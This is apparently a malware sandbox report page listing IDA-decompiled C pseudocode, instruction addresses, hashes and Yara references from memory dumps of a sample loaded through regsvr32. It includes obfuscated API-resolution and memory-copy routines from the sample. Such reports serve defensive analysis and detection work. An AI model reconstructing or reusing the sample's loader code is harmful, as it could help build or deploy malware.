											_t240 = _t390 << _t259 | _t401;
											 *(_t223 + 0x16b8) = _t240;
											 *( *_t193 +  *_t194) = _t240;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t199 = _t223 + 0x14; // 0xc703f045
											_t200 = _t223 + 8; // 0x8d000040
											_t201 = _t223 + 0x16b9; // 0x89fffffe
											 *((char*)( *_t199 +  *_t200)) =  *_t201;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
											 *(_t223 + 0x16b8) = _t390 >> 0x10;
										}
										goto L35;
									}
									_t123 = _t223 + 0xac0; // 0x4e9
									_t343 =  *_t123 & 0x0000ffff;
									_t124 = _t223 + 0xac2; // 0x33000000
									_t241 =  *_t124 & 0x0000ffff;
									_v24 = _t343;
									_t126 = _t223 + 0x16b8; // 0xfffffe8b
									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
									_v28 = _t346;
									if(_t400 > 0x10 - _t241) {
										_t128 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t346;
										_t130 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t130 +  *_t128)) = _v28;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t136 = _t223 + 0x14; // 0xc703f045
										_t137 = _t223 + 8; // 0x8d000040
										_t138 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t136 +  *_t137)) =  *_t138;
										_t142 = _t223 + 0x16bc; // 0x8b3c7e89
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t346 = _v24 >> 0x10;
										_t400 =  *_t142 + 0xfffffff0;
									}
									_t403 = _t400 + _t241;
									_t347 = _t346 & 0x0000ffff;
									 *(_t223 + 0x16bc) = _t403;
									 *(_t223 + 0x16b8) = _t347;
									_t348 = _t347 & 0x0000ffff;
									if(_t403 <= 0xd) {
										_t163 = _t403 + 3; // 0x8b3c7e8c
										_t275 = _t163;
										L28:
										 *(_t223 + 0x16bc) = _t275;
										_t165 = _t388 - 3; // -2
										_t166 = _t223 + 0x16b8; // 0xfffffe8b
										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
									} else {
										_t392 = _t388 + 0xfffffffd;
										_t147 = _t223 + 0x14; // 0xc703f045
										_t244 = _t392 << _t403 | _t348;
										_t148 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t244;
										 *( *_t148 +  *_t147) = _t244;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t153 = _t223 + 0x14; // 0xc703f045
										_t154 = _t223 + 8; // 0x8d000040
										_t155 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t153 +  *_t154)) =  *_t155;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
									}
									goto L35;
								}
								_t289 = _a12;
								if(_t289 != _t398) {
									_t53 = _t289 * 4; // 0x238830a
									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
									_t56 = _t235 * 4; // 0x830a74c0
									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
									_t58 = _t223 + 0x16bc; // 0x8b3c7e89
									_t407 =  *_t58;
									_v28 = _t370;
									_t60 = _t223 + 0x16b8; // 0xfffffe8b
									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
									if(_t407 <= 0x10 - _t396) {
										_t373 = _t249;
										_t308 = _t407 + _t396;
									} else {
										_t61 = _t223 + 0x14; // 0xc703f045
										_t62 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t249;
										 *( *_t62 +  *_t61) = _t249;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t67 = _t223 + 0x14; // 0xc703f045
										_t68 = _t223 + 8; // 0x8d000040
										_t69 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t67 +  *_t68)) =  *_t69;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t75 = _t223 + 0x16bc; // 0x8b3c7e89
										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
										_t308 =  *_t75 + 0xfffffff0 + _t396;
									}
									_t388 = _v24;
									 *(_t223 + 0x16bc) = _t308;
									 *(_t223 + 0x16b8) = _t373;
								}
								_t80 = _t223 + 0xabc; // 0x5d0674c0
								_t358 =  *_t80 & 0x0000ffff;
								_t81 = _t223 + 0x16bc; // 0x8b3c7e89
								_t402 =  *_t81;
								_t82 = _t223 + 0xabe; // 0x4e95d06
								_t245 =  *_t82 & 0x0000ffff;
								_v24 = _t358;
								_t84 = _t223 + 0x16b8; // 0xfffffe8b
								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
								_v28 = _t361;
								if(_t402 > 0x10 - _t245) {
									_t86 = _t223 + 0x14; // 0xc703f045
									 *(_t223 + 0x16b8) = _t361;
									_t88 = _t223 + 8; // 0x8d000040
									 *((char*)( *_t88 +  *_t86)) = _v28;
									_t223 = _a4;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t94 = _t223 + 0x14; // 0xc703f045
									_t95 = _t223 + 8; // 0x8d000040
									_t96 = _t223 + 0x16b9; // 0x89fffffe
									 *((char*)( *_t94 +  *_t95)) =  *_t96;
									_t100 = _t223 + 0x16bc; // 0x8b3c7e89
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t361 = _v24 >> 0x10;
									_t402 =  *_t100 + 0xfffffff0;
								}
								_t403 = _t402 + _t245;
								_t362 = _t361 & 0x0000ffff;
								 *(_t223 + 0x16bc) = _t403;
								 *(_t223 + 0x16b8) = _t362;
								_t363 = _t362 & 0x0000ffff;
								if(_t403 <= 0xe) {
									_t121 = _t403 + 2; // 0x8b3c7e8b
									_t275 = _t121;
									goto L28;
								} else {
									_t394 = _t388 + 0xfffffffd;
									_t105 = _t223 + 0x14; // 0xc703f045
									_t248 = _t394 << _t403 | _t363;
									_t106 = _t223 + 8; // 0x8d000040
									 *(_t223 + 0x16b8) = _t248;
									 *( *_t106 +  *_t105) = _t248;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t111 = _t223 + 0x14; // 0xc703f045
									_t112 = _t223 + 8; // 0x8d000040
									_t113 = _t223 + 0x16b9; // 0x89fffffe
									 *((char*)( *_t111 +  *_t112)) =  *_t113;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
									goto L35;
								}
							} else {
								_t316 = _t223 + (_t235 + 0x29f) * 4;
								_v28 = _t316;
								do {
									_t378 = _a12;
									_t22 = _t223 + 0x16bc; // 0x8b3c7e89
									_t409 =  *_t22;
									_t24 = _t378 * 4; // 0x238830a
									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
									_t379 =  *_t316 & 0x0000ffff;
									_v24 = _t379;
									_t27 = _t223 + 0x16b8; // 0xfffffe8b
									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
									_v20 = _t382;
									if(_t409 <= 0x10 - _t250) {
										_t321 = _t409 + _t250;
									} else {
										_t29 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t382;
										_t31 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t31 +  *_t29)) = _v20;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t37 = _t223 + 0x14; // 0xc703f045
										_t38 = _t223 + 8; // 0x8d000040
										_t39 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t37 +  *_t38)) =  *_t39;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t382 = _v24 >> 0x10;
										_t45 = _t223 + 0x16bc; // 0x8b3c7e89
										_t321 =  *_t45 + 0xfffffff0 + _t250;
									}
									 *(_t223 + 0x16bc) = _t321;
									_t316 = _v28;
									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
									_t388 = _t388 - 1;
								} while (_t388 != 0);
								L35:
								_t235 = _v8;
								_t388 = 0;
								_t398 = _a12;
								if(_t235 != 0) {
									if(_a8 != _t235) {
										_t329 = 7;
										_t217 = _t329 - 3; // 0x4
										_t254 = _t217;
									} else {
										_t329 = 6;
										_t216 = _t329 - 3; // 0x3
										_t254 = _t216;
									}
								} else {
									_t329 = 0x8a;
									_t214 = _t388 + 3; // 0x3
									_t254 = _t214;
								}
								goto L41;
							}
						}
						_t223 = _a4;
						if(_t235 == _v8) {
							_t235 = _v8;
							goto L41;
						}
						goto L4;
						L41:
						_v12 =  &(_v12[2]);
						_t221 =  &_v16;
						 *_t221 = _v16 - 1;
					} while ( *_t221 != 0);
					goto L42;
				}
			}

0x10016eb3
0x10016eba
0x10016ebe
0x10016ec0
0x10016ec2
0x10016ec8
0x100173b5
0x100173bb
0x10016ece
0x10016eda
0x10016ee7
0x10016eea
0x10016ef1
0x10016ef4
0x10016ef7
0x10016efa
0x10016efb
0x10016efe
0x10016f04
0x10016f07
0x10016f0c
0x10016f1c
0x10016f1e
0x10016fd4
0x10017163
0x10017163
0x1001716c
0x1001727f
0x1001727f
0x10017286
0x10017286
0x1001728f
0x1001729c
0x100172a5
0x100172a8
0x100172ad
0x100172f5
0x100172af
0x100172af
0x100172b2
0x100172b9
0x100172bf
0x100172c2
0x100172c5
0x100172c8
0x100172cb
0x100172ce
0x100172d4
0x100172e2
0x100172e5
0x100172e8
0x100172f1
0x100172f1
0x100172f8
0x100172fb
0x10017301
0x10017308
0x1001730e
0x1001735c
0x10017368
0x1001736f
0x10017310
0x10017310
0x10017313
0x1001731c
0x1001731f
0x10017322
0x10017329
0x1001732c
0x1001732f
0x10017332
0x10017335
0x1001733b
0x10017346
0x1001734c
0x10017353
0x10017353
0x00000000
0x1001730e
0x10017172
0x10017172
0x10017179
0x10017179
0x10017182
0x1001718f
0x10017198
0x1001719b
0x100171a0
0x100171a2
0x100171a5
0x100171ac
0x100171b2
0x100171b5
0x100171b8
0x100171bb
0x100171be
0x100171c1
0x100171c7
0x100171d5
0x100171db
0x100171de
0x100171e1
0x100171e1
0x100171e4
0x100171e6
0x100171e9
0x100171ef
0x100171f6
0x100171fc
0x10017255
0x10017255
0x10017258
0x10017258
0x1001725e
0x10017266
0x10017273
0x100171fe
0x100171fe
0x10017209
0x1001720c
0x1001720f
0x10017212
0x10017219
0x1001721c
0x1001721f
0x10017222
0x10017225
0x1001722b
0x10017237
0x1001723c
0x10017249
0x10017249
0x00000000
0x100171fc
0x10016fda
0x10016fdf
0x10016fe5
0x10016fe5
0x10016fed
0x10016fed
0x10016ff5
0x10016ff5
0x10016ffd
0x1001700a
0x10017013
0x10017018
0x1001705d
0x1001705f
0x1001701a
0x1001701a
0x1001701d
0x10017020
0x10017027
0x1001702a
0x1001702d
0x10017030
0x10017033
0x10017039
0x10017047
0x1001704d
0x10017056
0x10017059
0x10017059
0x10017062
0x10017065
0x1001706b
0x1001706b
0x10017072
0x10017072
0x10017079
0x10017079
0x10017081
0x10017081
0x10017088
0x10017095
0x1001709e
0x100170a1
0x100170a6
0x100170a8
0x100170ab
0x100170b2
0x100170b8
0x100170bb
0x100170be
0x100170c1
0x100170c4
0x100170c7
0x100170cd
0x100170db
0x100170e1
0x100170e4
0x100170e7
0x100170e7
0x100170ea
0x100170ec
0x100170ef
0x100170f5
0x100170fc
0x10017102
0x1001715b
0x1001715b
0x00000000
0x10017104
0x10017104
0x1001710f
0x10017112
0x10017115
0x10017118
0x1001711f
0x10017122
0x10017125
0x10017128
0x1001712b
0x10017131
0x1001713d
0x10017142
0x1001714f
0x00000000
0x1001714f
0x10016f24
0x10016f2a
0x10016f2d
0x10016f30
0x10016f30
0x10016f33
0x10016f33
0x10016f39
0x10016f39
0x10016f41
0x10016f46
0x10016f53
0x10016f5c
0x10016f5f
0x10016f64
0x10016fac
0x10016f66
0x10016f66
0x10016f69
0x10016f70
0x10016f76
0x10016f79
0x10016f7c
0x10016f7f
0x10016f82
0x10016f85
0x10016f8b
0x10016f99
0x10016f9c
0x10016f9f
0x10016fa8
0x10016fa8
0x10016fb2
0x10016fb8
0x10016fbb
0x10016fc2
0x10016fc2
0x10017375
0x10017375
0x10017378
0x1001737a
0x1001737f
0x1001738e
0x1001739a
0x1001739f
0x1001739f
0x10017390
0x10017390
0x10017395
0x10017395
0x10017395
0x10017381
0x10017381
0x10017386
0x10017386
0x10017386
0x00000000
0x1001737f
0x10016f1e
0x10016f13
0x10016f16
0x100173a4
0x00000000
0x100173a4
0x00000000
0x100173a7
0x100173a7
0x100173ab
0x100173ab
0x100173ab
0x00000000
0x10016ef4

Memory Dump Source

Source File: 00000006.00000002.622340870.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.622309634.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
Instruction ID: 0c3308942ac57208bd8606007510a2814f56dadb0132f9c471c079d8b51e24d2
Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
Instruction Fuzzy Hash: EEF16D755092518FC709CF18C4D48FA7BF1FFA9310B1A82F9D8999B3A6D731A980CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00191827, Relevance: .3, Instructions: 307
COMMONCrypto

Download Yara Rule

C-Code - Quality: 62%

			E00191827(void* __eax, void* __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi, signed int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr _t165;
				signed int _t166;
				signed int _t168;
				signed int _t173;
				intOrPtr _t175;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed int _t182;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t191;
				signed int _t193;
				signed int _t195;
				signed int _t196;
				void* _t198;
				signed int _t207;
				signed int _t209;
				signed int _t210;
				signed int _t222;
				signed int _t231;
				signed int _t234;
				signed int _t245;
				signed int _t248;
				signed int _t251;
				signed int _t258;
				intOrPtr* _t263;
				signed int* _t264;
				signed int* _t265;
				signed int* _t266;

				_t248 = __esi;
				_t245 = __edi;
				_t231 = __edx;
				_t201 = __ecx;
				_t198 = __ebx;
				_t163 = __eax;
				if( *(__ebx + 0x43542a) == 0) {
					_push(__eax);
					_push(__ecx);
					_push( *((intOrPtr*)(__ebx + 0x435920)));
					_push( *((intOrPtr*)(__ebx + 0x4355cd)));
					_push( *((intOrPtr*)(__ebx + 0x4357aa)));
					_push(0x23);
					_push( *((intOrPtr*)(__ebx + 0x435327)));
					_push(2);
					_t196 =  *((intOrPtr*)(__ebx + 0x4410a0))();
					_v12 = __ecx;
					 *(__ebx + 0x43542a) =  *(__ebx + 0x43542a) & 0x00000000;
					 *(__ebx + 0x43542a) =  *(__ebx + 0x43542a) | __ecx & 0x00000000 | _t196;
					 *_t13 = 0;
					_t201 = 0 ^ _v12;
					_t163 = (_t196 & 0x00000000) +  *_t263;
					_t263 = _t263 - 0xfffffffc;
				}
				_push(_t201);
				if( *(_t198 + 0x43547a) == 0) {
					_t195 =  *((intOrPtr*)(_t198 + 0x4410a0))( *((intOrPtr*)(_t198 + 0x435860)), 0xffffffff,  *((intOrPtr*)(_t198 + 0x4353a2)),  *((intOrPtr*)(_t198 + 0x435466)),  *((intOrPtr*)(_t198 + 0x435990)),  *((intOrPtr*)(_t198 + 0x4354de)),  *((intOrPtr*)(_t198 + 0x435192)));
					_v12 = _t245;
					 *(_t198 + 0x43547a) = 0 ^ _t195;
					_t245 = _v12;
				}
				_push(_t198 + 0x43533b);
				_t165 = _t198 + 0x4359d1;
				if( *(_t198 + 0x43512e) == 0) {
					_t193 =  *((intOrPtr*)(_t198 + 0x441070))( *((intOrPtr*)(_t198 + 0x435679)), _t165);
					_v12 = _t248;
					 *(_t198 + 0x43512e) =  *(_t198 + 0x43512e) & 0x00000000;
					 *(_t198 + 0x43512e) =  *(_t198 + 0x43512e) ^ (_t248 & 0x00000000 | _t193);
					_t248 = _v12;
					_t165 =  *_t263;
					_t263 = _t263 - 0xfffffffc;
				}
				_t166 =  *((intOrPtr*)(_t198 + 0x441044))(_t165);
				if( *(_t198 + 0x435890) == 0) {
					_t191 =  *((intOrPtr*)(_t198 + 0x44105c))();
					_v12 = _t231;
					 *(_t198 + 0x435890) =  *(_t198 + 0x435890) & 0x00000000;
					 *(_t198 + 0x435890) =  *(_t198 + 0x435890) | _t231 ^ _v12 ^ _t191;
					_t231 = _v12;
					 *_t47 = _t166;
					_t166 = _v12;
				}
				_v12 = _t201;
				 *(_t198 + 0x43529c) =  *(_t198 + 0x43529c) & 0x00000000;
				 *(_t198 + 0x43529c) =  *(_t198 + 0x43529c) ^ (_t201 & 0x00000000 | _t166);
				_t264 = _t263 - 0xfffffffc;
				_t168 = 0 ^  *_t264;
				_t265 = _t264 - 0xfffffffc;
				_push( *_t263);
				if( *((intOrPtr*)(_t198 + 0x43526c)) == 0) {
					 *_t59 =  *((intOrPtr*)(_t198 + 0x4410a8))( *((intOrPtr*)(_t198 + 0x43561d)),  *((intOrPtr*)(_t198 + 0x4356c5)), _t168);
					_push(_v12);
					_pop( *_t61);
					_t168 =  *_t265;
					_t265 =  &(_t265[1]);
				}
				if( *(_t198 + 0x4350a4) == 0) {
					_push(_t168);
					_push( *((intOrPtr*)(_t198 + 0x43581d)));
					if( *((intOrPtr*)(_t198 + 0x435631)) == 0) {
						_t188 =  *((intOrPtr*)(_t198 + 0x441064))(_t198 + 0x4350f2);
						_v12 = _t231;
						 *((intOrPtr*)(_t198 + 0x435631)) = _t188;
						_t231 = _v12;
					}
					_t182 =  *((intOrPtr*)(_t198 + 0x4410a4))();
					if( *((intOrPtr*)(_t198 + 0x435496)) == 0) {
						_t185 =  *((intOrPtr*)(_t198 + 0x441064))(_t198 + 0x43532b, _t182);
						 *_t265 = _t258;
						 *((intOrPtr*)(_t198 + 0x435496)) = _t185;
						_t258 = 0;
						_t182 =  *_t265;
						_t265 =  &(_t265[1]);
					}
					_v12 = _t231;
					 *(_t198 + 0x4350a4) =  *(_t198 + 0x4350a4) & 0x00000000;
					 *(_t198 + 0x4350a4) =  *(_t198 + 0x4350a4) | _t231 - _v12 | _t182;
					_t231 = _v12;
					_t168 =  *_t265;
					_t265 =  &(_t265[1]);
				}
				_v12 = _t231;
				_t207 = 0 ^ _a4;
				_t234 = _v12;
				_v12 = _t248;
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 ^ (_t248 & 0x00000000 | _t207);
				_t251 = _v12;
				if( *(_t198 + 0x43515e) == 0) {
					_t180 =  *((intOrPtr*)(_t198 + 0x4410a4))( *((intOrPtr*)(_t198 + 0x4353be)), _t207, _t168);
					 *_t265 = _t234;
					 *(_t198 + 0x43515e) = _t180;
					_t234 = 0;
					_t207 = _t207 & 0x00000000 |  *_t265;
					_t265 =  &(_t265[1]);
					_pop( *_t95);
					_t168 = _t180 & 0x00000000 ^ _v12;
				}
				do {
					_t209 = _t207 + _a8 ^ _a4;
					_t198 = _t198;
					if( *((intOrPtr*)(_t198 + 0x4354ce)) == 0) {
						if( *(_t198 + 0x43552c) == 0) {
							_t178 =  *((intOrPtr*)(_t198 + 0x441064))(_t198 + 0x43586c, _t209, _t168);
							 *_t265 = _t258;
							 *(_t198 + 0x43552c) = 0 ^ _t178;
							_t258 = 0;
							_t209 = _t209 & 0x00000000 |  *_t265;
							_t265 =  &(_t265[1]);
							_pop( *_t104);
							_t168 = _v12;
						}
						 *_t108 =  *((intOrPtr*)(_t198 + 0x44106c))(_t198 + 0x435782, _t209, _t168);
						_push(_v12);
						_pop( *_t110);
						_t209 = 0 ^  *_t265;
						_t266 =  &(_t265[1]);
						_t168 =  *_t266;
						_t265 = _t266 - 0xfffffffc;
					}
					if(_t209 > _a12) {
						if( *((intOrPtr*)(_t198 + 0x4351df)) == 0) {
							_t175 =  *((intOrPtr*)(_t198 + 0x441064))(_t198 + 0x435382, _t209, _t168);
							 *_t265 = _t209;
							 *((intOrPtr*)(_t198 + 0x4351df)) = _t175;
							_t222 = 0;
							_t209 = (_t222 & 0x00000000) +  *_t265;
							_t265 =  &(_t265[1]);
							_pop( *_t116);
							_t168 = _v12;
						}
						_a16 = _a16 + _t168;
					}
					_t210 = _t209 + _a16;
					if(_t210 > 0) {
						if( *(_t198 + 0x4350e0) == 0) {
							_t173 =  *((intOrPtr*)(_t198 + 0x4410a8))(0, 1);
							_v12 = _t251;
							 *(_t198 + 0x4350e0) =  *(_t198 + 0x4350e0) & 0x00000000;
							 *(_t198 + 0x4350e0) =  *(_t198 + 0x4350e0) | _t251 - _v12 | _t173;
							_t251 = _v12;
						}
						_t168 =  *((intOrPtr*)(_t198 + 0x441040))();
						_a12 = _a12 & 0x00000000;
						_a12 = _a12 | _t251 & 0x00000000 | _t168;
						_t251 = _t251;
						_t210 = _t210 + _a4;
						if( *(_t198 + 0x43560d) == 0) {
							_t168 =  *((intOrPtr*)(_t198 + 0x4410a4))(1, _t210);
							_v12 = _t210;
							 *(_t198 + 0x43560d) =  *(_t198 + 0x43560d) & 0x00000000;
							 *(_t198 + 0x43560d) =  *(_t198 + 0x43560d) ^ (_t210 & 0x00000000 | _t168);
							_t210 =  *_t265;
							_t265 = _t265 - 0xfffffffc;
						}
						if(_t210 > _a8) {
							_push(_a8);
							if( *(_t198 + 0x43519f) == 0) {
								_t179 =  *((intOrPtr*)(_t198 + 0x441060))();
								 *(_t198 + 0x43519f) =  *(_t198 + 0x43519f) & 0x00000000;
								 *(_t198 + 0x43519f) =  *(_t198 + 0x43519f) | _t234 & 0x00000000 ^ _t179;
								_t234 = _t234;
								 *_t152 = _t210;
								_t210 = _t210 & 0x00000000 ^ _v12;
							}
							_t168 = E00194162(_t198, _t210, _t234, _t245, _t251);
							if( *((intOrPtr*)(_t198 + 0x435000)) == 0) {
								_t168 =  *((intOrPtr*)(_t198 + 0x441060))(_t210);
								 *_t156 = _t168;
								_push(_v12);
								_pop( *_t158);
								_t210 = 0 ^  *_t265;
								_t265 =  &(_t265[1]);
							}
						}
					}
					_t207 = (_t210 & _a16) + _a4;
					_t161 =  &_v8;
					 *_t161 = _v8 - 1;
				} while ( *_t161 != 0);
				return 0;
			}

0x00191827
0x00191827
0x00191827
0x00191827
0x00191827
0x00191827
0x00191834
0x00191836
0x00191837
0x00191838
0x0019183e
0x00191844
0x0019184a
0x0019184c
0x00191852
0x00191856
0x0019185c
0x00191864
0x0019186b
0x00191876
0x00191879
0x00191882
0x00191885
0x00191885
0x00191889
0x00191891
0x001918b9
0x001918bf
0x001918c6
0x001918cc
0x001918cc
0x001918d5
0x001918d6
0x001918e3
0x001918ec
0x001918f2
0x001918fa
0x00191901
0x00191907
0x00191910
0x00191913
0x00191913
0x00191917
0x00191924
0x00191927
0x0019192d
0x00191935
0x0019193c
0x00191942
0x00191947
0x0019194a
0x0019194a
0x0019194d
0x00191955
0x0019195c
0x0019196a
0x0019196f
0x00191972
0x00191975
0x0019197d
0x00191993
0x00191996
0x00191999
0x001919a5
0x001919a8
0x001919a8
0x001919b2
0x001919b8
0x001919b9
0x001919c6
0x001919cf
0x001919d5
0x001919dc
0x001919e2
0x001919e2
0x001919e5
0x001919f2
0x001919fc
0x00191a04
0x00191a0b
0x00191a11
0x00191a18
0x00191a1b
0x00191a1b
0x00191a1e
0x00191a26
0x00191a2d
0x00191a33
0x00191a38
0x00191a3b
0x00191a3b
0x00191a3e
0x00191a46
0x00191a48
0x00191a4b
0x00191a53
0x00191a57
0x00191a5a
0x00191a64
0x00191a6e
0x00191a76
0x00191a7d
0x00191a83
0x00191a8a
0x00191a8d
0x00191a96
0x00191a99
0x00191a99
0x00191a9c
0x00191aa5
0x00191aa7
0x00191aaf
0x00191ab8
0x00191ac3
0x00191acb
0x00191ad2
0x00191ad8
0x00191adf
0x00191ae2
0x00191ae5
0x00191ae8
0x00191ae8
0x00191afb
0x00191afe
0x00191b01
0x00191b09
0x00191b0c
0x00191b11
0x00191b14
0x00191b14
0x00191b1a
0x00191b23
0x00191b2e
0x00191b36
0x00191b3d
0x00191b43
0x00191b4a
0x00191b4d
0x00191b52
0x00191b55
0x00191b55
0x00191b58
0x00191b58
0x00191b5b
0x00191b61
0x00191b6e
0x00191b74
0x00191b7a
0x00191b82
0x00191b89
0x00191b8f
0x00191b8f
0x00191b92
0x00191b9e
0x00191ba2
0x00191ba5
0x00191ba6
0x00191bb0
0x00191bb5
0x00191bbb
0x00191bc3
0x00191bca
0x00191bd5
0x00191bd8
0x00191bd8
0x00191bde
0x00191be0
0x00191bea
0x00191bed
0x00191bf9
0x00191c00
0x00191c06
0x00191c0d
0x00191c10
0x00191c10
0x00191c13
0x00191c1f
0x00191c22
0x00191c29
0x00191c2c
0x00191c2f
0x00191c37
0x00191c3a
0x00191c3a
0x00191c1f
0x00191bde
0x00191c40
0x00191c43
0x00191c43
0x00191c43
0x00191c5a

Memory Dump Source

Source File: 00000006.00000002.618572860.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_190000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f9300375a47c9c0b9ce0fa8dd9576d32fcc0e3f0f2c61a7eb1a98b77313a69a
Instruction ID: f54421ab7f1142172477650bffaf17ba30d8036149207d13e6a1e53222052090
Opcode Fuzzy Hash: 5f9300375a47c9c0b9ce0fa8dd9576d32fcc0e3f0f2c61a7eb1a98b77313a69a
Instruction Fuzzy Hash: 98D16072804504EFFF08DFA4C989BA97BB1FF24321F0851A9ED0D9E189D77456A0CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00191000, Relevance: .3, Instructions: 284
COMMONCrypto

Download Yara Rule

C-Code - Quality: 51%

			_entry_() {
				signed int _v12;
				signed int _v16;
				void* _t159;
				signed int _t160;
				signed int _t161;
				signed int _t163;
				signed int _t166;
				signed int _t168;
				signed int _t169;
				signed int _t171;
				signed int _t173;
				signed int _t178;
				signed int _t180;
				signed int _t182;
				intOrPtr _t183;
				signed int _t185;
				intOrPtr _t186;
				void* _t187;
				signed int _t188;
				int _t190;
				signed int _t192;
				signed int _t205;
				signed int _t215;
				signed int _t217;
				void* _t220;
				signed int _t222;
				signed int _t228;
				signed int _t231;
				signed int _t235;
				void* _t238;
				signed int _t251;
				signed int _t257;
				signed int* _t258;
				signed int* _t259;

				_push(0);
				_t251 = _t257;
				_t258 = _t257 + 0xfffffff8;
				_t160 = E0019463B(_t159, _t187, _t188, _t215);
				if(_t187 == _t160) {
					L25:
					_v12 = _t228;
					_t217 = _t215 & 0x00000000 | _t228 - _v12 | _t160;
					_t231 = _v12;
					if( *(_t187 + 0x4358e0) == 0) {
						_t171 =  *((intOrPtr*)(_t187 + 0x44105c))();
						 *_t258 = _t188;
						 *(_t187 + 0x4358e0) = 0 ^ _t171;
						_t188 = 0;
					}
					_v16 = _t231;
					 *(_t187 + 0x43596c) =  *(_t187 + 0x43596c) & 0x00000000;
					 *(_t187 + 0x43596c) =  *(_t187 + 0x43596c) ^ (_t231 & 0x00000000 | _t217);
					if(_t187 > 0) {
						 *(_t187 + 0x4350b0) =  *(_t187 + 0x4350b0) + _t187;
						if( *((intOrPtr*)(_t187 + 0x435152)) == 0) {
							 *_t109 =  *((intOrPtr*)(_t187 + 0x4410a0))( *((intOrPtr*)(_t187 + 0x4355c9)),  *((intOrPtr*)(_t187 + 0x4357ba)),  *((intOrPtr*)(_t187 + 0x435048)), 0x62,  *((intOrPtr*)(_t187 + 0x43567d)),  *((intOrPtr*)(_t187 + 0x43531b)), 4);
							_push(_v12);
							_pop( *_t111);
						}
						 *((intOrPtr*)(_t187 + 0x435288)) =  *((intOrPtr*)(_t187 + 0x435288)) + _t187;
					}
					_v12 = _t217;
					_t235 = 0 ^  *(_t187 + 0x4350b0);
					_t220 = _v12;
					if( *(_t187 + 0x4356dd) == 0) {
						_t169 =  *((intOrPtr*)(_t187 + 0x441058))();
						_v16 = _t188;
						 *(_t187 + 0x4356dd) =  *(_t187 + 0x4356dd) & 0x00000000;
						 *(_t187 + 0x4356dd) =  *(_t187 + 0x4356dd) | _t188 & 0x00000000 | _t169;
						_t188 = _v16;
					}
					_t190 = _t188 & 0x00000000 ^ (_t235 & 0x00000000 |  *(_t187 + 0x435462));
					_t238 = _t235;
					asm("cld");
					_t161 = memcpy(_t220, _t238, _t190);
					_t259 =  &(_t258[3]);
					_t222 = _t238 + _t190 + _t190;
					 *_t259 = 0xfffff;
					_t192 = _t205;
					if( *(_t187 + 0x435621) == 0) {
